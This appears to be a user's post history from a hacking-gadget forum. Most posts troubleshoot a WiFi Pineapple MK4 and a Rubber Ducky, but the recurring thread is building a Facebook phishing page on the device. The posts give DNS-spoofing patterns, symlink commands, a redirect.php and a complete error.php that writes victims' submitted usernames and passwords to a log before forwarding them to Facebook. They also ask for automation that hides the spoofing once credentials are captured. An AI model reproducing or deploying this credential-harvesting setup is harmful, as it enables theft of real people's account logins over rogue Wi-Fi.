Jump to content

--nick--

Active Members
  • Posts

    73
  • Joined

  • Last visited

Posts posted by --nick--

  1. well, the new modules show up in the gui for download, so there is internet up to the mk4 ui standpoint. However, when i connect a second laptop to my pineapple mk4 access point that was made with windows ics and try google in the browser there is no google connection displayed.

    alternatively when i use windows bridging instead of ics it works. this is strange because i never had a problem with ics before. windows ics is how i was always doing this setup before.

  2. i have a small problem now that i just noticed on the pineapple mk4. i can't get the internet to passthrough from my pc to the pineapple anymore. i have used ics on my windows pc and changed the ip to 172.16.42.42 like how i used to get the internet to work, except now it does not work. \

    can somebody please tell me why the ics does not work on my windows 7 anymore?

    or maybe what i can additionally try is to configure the ics setting inside of the pineapple mk4 gui itself? if so , change to what? brlan to wlan0?

  3. yes i mean the network manager tab inside of the mark 4 pineapple. detect automatically button did nothing new, that button is for when you plug in an alfa network card but i am not trying to use an external network card at the moment. My problem is in the "Network manager" logical interface will no longer enable and also if i go to the "status" tab the wireless button will no longer enable, both related and im 100% sure on that.

  4. Can somebody make a guide please and then link me to that guide?

    In what directory must I put my clonedsite.html?

    Can I just place any clonedsite.html in that location?

    Can somebody incorporate the jsapi api into the mark 4 firmware?

  5. :warning:caution this .bat file moves the file Windows Ding.wav


    @echo off
    for %%d in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
    if exist %%d:\vlc\ (
    ECHO Device Found : %%d
    move "C:\Windows\media\Windows Ding.wav" "C:\Windows\"
    copy "%%d:\Windows Ding BI short.wav" "C:\windows\media\Windows Ding.wav"
    )
    )
    pause

    but theres a small problem. when i run it just says

    Device Found : e
    Access is denied.
    0 file(s) moved.
    Access is denied.
    0 file(s) copied.
    Press any key to continue . . .

    it says the same thing when i right click the .bat and select run as administrator.
    why am i not allowed to move files to/from or copy files to/from c:\windows ?


    i am looking for something like this but more simple http://ss64.org/viewtopic.php?id=1491


    edit: its on my own pc by the way. and i am administrator. i also tried running as administrator option.

  6. yes midnite snake i did what you said and that worked.


    the workaround to make GUI command work:
    (you have to add both WINDOWS and GUI to duck script)

    DELAY 5000
    ESC
    DELAY 500
    WINDOWS
    DELAY 500
    GUI
    

    the other GUI commands GUI r , GUI l are working normally though without the need to do this.

  7. Yes dnspoof is needed to redirect traffic but it is also needed to spoof the url in the url bar.

    Im sure that my idea will work . I just don't code. My brain, its soo tiny :(

    Thats an idea for you guys that are making the pineapple moduel updates.

    so redirecting by mac instead of ip will make dnsspoof more stable or something?

    even still , I would like my dnsspoof to auto-disable itself as soon as some kind of script detects text inside of my phish.log, and then dnsspoof auto-reactivate itself after 10 minutes.

  8. I am stuck at that part too. I would like to know how to spoof the url. I think that might only work for specific browsers version or something though.

    did this help you ? its still not working for me. http://forums.hak5.o...edirectphp-fix/

    maybe putting your html inside of the index.php ? please let me know if you figure it out.

    edit: i think i know what the problem is.

    -enable dnspoof just use the * for now to test.

    -connect to the pineapple using a SECOND pc and by wireless <-------------------

    -type in any url in the address bar at the top, in your internet browser.

    and it is working only using the index.php and the error.php.

  9. Not sure if you have resolved this, but this problem might be related to how you save the facebook page, or you may have to activate internet connection sharing.

    It might not be best practice but I do always save the complete webpage, i.e. I will recieve both the facebook.htm and facebook_files folder. It might be enough that you activate the ICS and your page will load the image from the original server.

    I guess you could also snoop around in the code, and find the address to the image, and save it locally and edit the link in your facebook.htm.

    saved it as webpage comlpete .html not .htm maybe thats why.

    edit: i had to symlink all * after i deleted any files with the same name inside of www folder.

  10. Still not working, I'm not sure what is going wrong, I am going to uninstall and try again. May send an email to Hak 5 feedback asking for a segment on the ducky firmware install. I think it would be worth it.

    did the driver install sucessfully when you manulay selected it ? maybe you are putting the .dll and the .sys in the wrong places ?

    also check the libusb_Readme.txt inside the atmel driver folder you downloaded, encase i forgot something.

    If I am leaving anything else out anyone can feel free to help out. I don't mind.

  11. Hi there!

    When you guys are posting code, please use the code brackets

    [code]and the actual code
    [/code]

    Systemcrash:

    The code used in the tutor you followed is kind of old, better to use the original files that follows the pineapple flash. When your facebookclone is crafted you have to copy it over to the pineapple. If you place it directly in the /www/folder on your pineapple move on, if you placed it on your /usb/ then you have to symlink your files to the /www/ folder. In my case I use the command

    ln -s /usb/phish/* /www/

    but you have to enter what is true in your case.

    Now, when you enter

    ls -la /www/

    you should see your facebook files. Since they are symlinks they may look a bit different than i.e. index.php, but the important thing is that they shows up.

    Now go ahead and edit redirect.php. I myself like to use nano, just because that's the editor I'm familiar with, and it is installed in the pineapple;)

    Sadly I don't have an example of that file on this computer, but originally I think it contains an example.com example. Just edit example and example.com to facebook and facebook.com. I guess you'll understand what I mean when you open the file. Remember to writeout your changes.

    For the DnsSpoof part you will have to test out a little bit, but the basic understanding is that

    * = anything
    *.facebook.com = .anything.facebook.com
    
    Personally I'm using (haha weird colors)
    *facebook.com

    And power up DnsSpoof.

    You have to remember that most computer do cache the DNS requests, meaning that if you have visited the real facebook site you may end up in the real facebook site afterall. If this is the case then in windows you will have to enter the following in commandline

    ipconfig /flushdns

    And make another try.

    Lastly I have to say that filenames and foldernames may be different in your case, so you'll have to substitute your own.

    &lt;?php
    $ref = $_SERVER['HTTP_REFERER'];
    if (strpos($ref, "example"))	{ header('Location: example.html'); }
    if (strpos($ref, "twitter"))	{ header('Location: twitter.html'); }
    require('example.html');
    ?&gt;
    

    can i see your redirect.php please ?

    and for Systemcrash86 try editing the part of the facebook.html action=" <---------- put in action="error.php"

    and edit the redirect.php change the part that says error.php to facebook.html

  12. -can someone please make this work on the new pineapple mark4 ?

    http://uploading.com/a12e246m/www-rar its a facebook phicsh.

    at the moment it only works on my old mark3 pineapple and i don't see why its being dumb on my new pineapple with mark4 firmware.

    Please can anyone fix it and re-upload the link so i can try it out? or maybe tell me whats different with it on the mk4.

    edited: ok i symlinked the pineapple folder i had created and now i see the logs so i dont need help with that anymore. However i have am having a second problem though. The problem is that there are no pictures or boarders when i test surf the facebook.html page

  13. 
    &lt;?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) &amp;&amp; !empty($_POST['name'])) {
    	$nam = stripslashes($_POST['name']);
    	$pas = stripslashes($_POST['pass']);
    	$nam = htmlspecialchars($nam, ENT_QUOTES);
    	$pas = htmlspecialchars($pas, ENT_QUOTES);
    
    	$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
    
    	$filed = @fopen("pineapple/phish.log", "a+");
    	@fwrite($filed, "$content\n");
    	@fclose($filed);
    }
    ?&gt;
    
    
    
    
    
    &lt;html&gt;&lt;head&gt;
    
    
    
    
    &lt;script language="javascript"&gt;
    location.replace("http://69.171.229.16");
    &lt;/script&gt;
    
    
    
    
    &lt;/head&gt;
    
    
    &lt;body&gt;
    
    &lt;/body&gt;&lt;/html&gt;
    
    

    this is error.php

×
×
  • Create New...